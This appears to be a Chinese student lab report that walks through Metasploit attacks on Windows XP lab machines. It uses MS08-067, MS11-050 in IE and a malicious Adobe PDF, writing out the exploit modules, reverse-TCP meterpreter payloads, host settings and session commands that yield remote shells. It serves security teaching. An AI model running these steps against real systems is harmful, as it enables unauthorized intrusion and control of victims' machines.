20145232韩文浩《网络对抗》MSF基础应用
2017-04-15 15:38
696 查看
MS08-067漏洞攻击
攻击机:Kali:192.168.31.132靶机:win XP SP3(English):192.168.31.180
在VMware中设置两台虚拟机网络为NAT模式,自动分配IP地址,之后两台虚拟机修改IP后可以直接ping通。
MS08_067远程漏洞攻击实践:Shell
1、在kali终端中开启msfconsole。
2、输入命令search ms08_067,会显示出找到的渗透模块,如下图所示:
3、输入命令use exploit/windows/smb/ms08_067_netapi,进入该漏洞模块的使用。
4、输入命令
show payloads会显示出有效的攻击载荷,如下图所示,找到一个
shell_reverse_tcp。
5、命令
show targets会显示出可以被攻击的靶机的操作系统型号,如下图所示:
6、使用命令
set payload generic/shell_reverse_tcp设置攻击有效载荷。
7、输入命令
show options显示我们需要在攻击前需要设置的数据。
8、输入命令
set LHOST "192.168.31.132" set RHOST "192.168.31.180"
并使用命令show options再次查看payload状态。
9、输入命令exploit开始攻击,下图所示是正常攻击成功结果。
在kali上执行ipconfig/all得到如下图所示:
在win xp上执行同样的命令,如下图所示:
MS08_067远程漏洞攻击实践:meterpreter
1、前面依然使用命令
use exploit/windows/smb/ms08_067_netapi,进入ms08_067漏洞模块。
2、设置payload:
set payload windows/meterpreter/reverse_tcp
3、
show options,查看需要设置的ip地址。
4、成功攻击结果:
5、执行
ifconfig,查看靶机地址:
6、
ps查看进程:
7、meterpreter转shell:
MS11-050漏洞攻击
攻击机:Kali:192.168.31.132靶机:windows xp sp3:192.168.31.133
1、在kali终端中开启msfconsole。
2、输入命令
use windows/browser/ms11_050_mshtml_cobjectelement,进入该漏洞模块。
3、输入
info查看信息
对应的targets:
4、设置对应的载荷
set payload windows/meterpreter/reverse_tcp;
5、show options查看需要设置的相关信息:
6、设置相关信息
set LHOST ‘192.168.31.132’ set LPORT 5232 set URIPATH baidu
7、
exploit,如下图所示,有靶机需要访问的ip地址:
8、在靶机IE上输入网址,并在靶机上查看信息。
靶机端IE:
kali中显示一个session 1已经创建:
9、输入命令sessions -i 1,开始连接
10、已经攻击成功了,获取shell
Adobe阅读器渗透攻击
攻击机:Kali:192.168.31.132靶机:win XP SP3:192.168.31.134
1、在kali终端中开启msfconsole。
2、输入命令use exploit/windows/fileformat/adobe_cooltype_sing,进入该漏洞模块的使用。
3、使用命令
set payload windows/meterpreter/reverse_tcp设置攻击有效载荷。
4、输入命令
show options显示我们需要在攻击前需要设置的数据,如下图红框圈住的部分。
5、输入命令
set FILENAME 5232_Adobe.pdf set LHOST "192.168.31.132" set LPORT 5232
并使用命令show options,看是否设置成功。
6、输入
exploit,生成pdf文件,并可以看到pdf所在文件夹,将pdf复制到靶机里。
7、使用命令back退出当前模块,并使用use exploit/multi/handler新建一个监听模块。
8、使用
set payload windows/meterpreter/reverse_tcp建立一个反向连接。如下图所示,我需要输入命令
set LPORT 5232和攻击模块里的数据设置为一样的。
9、使用命令
exploit开始攻击,在xp中打开pdf。这里pdf比较难打开,直接在kali中等结果就可以啦,如下图:
实验问答
用自己的话解释什么是exploit,payload,encodeexploit是攻击监听的开始命令;payload是攻击载荷,是漏洞渗透的核心代码;encode是编码器,对payload的代码进行进一步编码。
相关文章推荐
- 20145223 杨梦云 《网络对抗》 MSF基础应用
- 20145210姚思羽《网络对抗》MSF基础应用实验
- 20145201李子璇 《网络对抗》MSF基础应用
- 20145219《网络对抗》MSF基础应用
- 20145326蔡馨熤《网络对抗》——MSF基础应用
- 20145316许心远《网络对抗》MSF基础应用
- 20145327 《网络对抗》MSF基础应用
- 20145120黄玄曦《网络对抗》MSF基础应用
- 20145318《网络对抗》MSF基础应用
- 20145227鄢曼君《网络对抗》MSF基础应用
- 20145336张子扬《网络对抗》MSF基础应用
- 20145231熊梓宏 《网络对抗》 实验5 MSF基础应用
- 20145338 《网络对抗》 MSF基础应用
- 20145302张薇 《网络对抗》MSF应用基础
- 20145305 《网络对抗》MSF基础应用
- 20145209刘一阳《网络对抗》实验五:MSF基础应用
- 20145310 《网络对抗》 MSF基础应用
- 20145309李昊《网络对抗》MSF应用基础
- 20145216史婧瑶 《网络对抗》 MSF基础应用
- 20145308 《网络对抗》 MSF基础应用 学习总结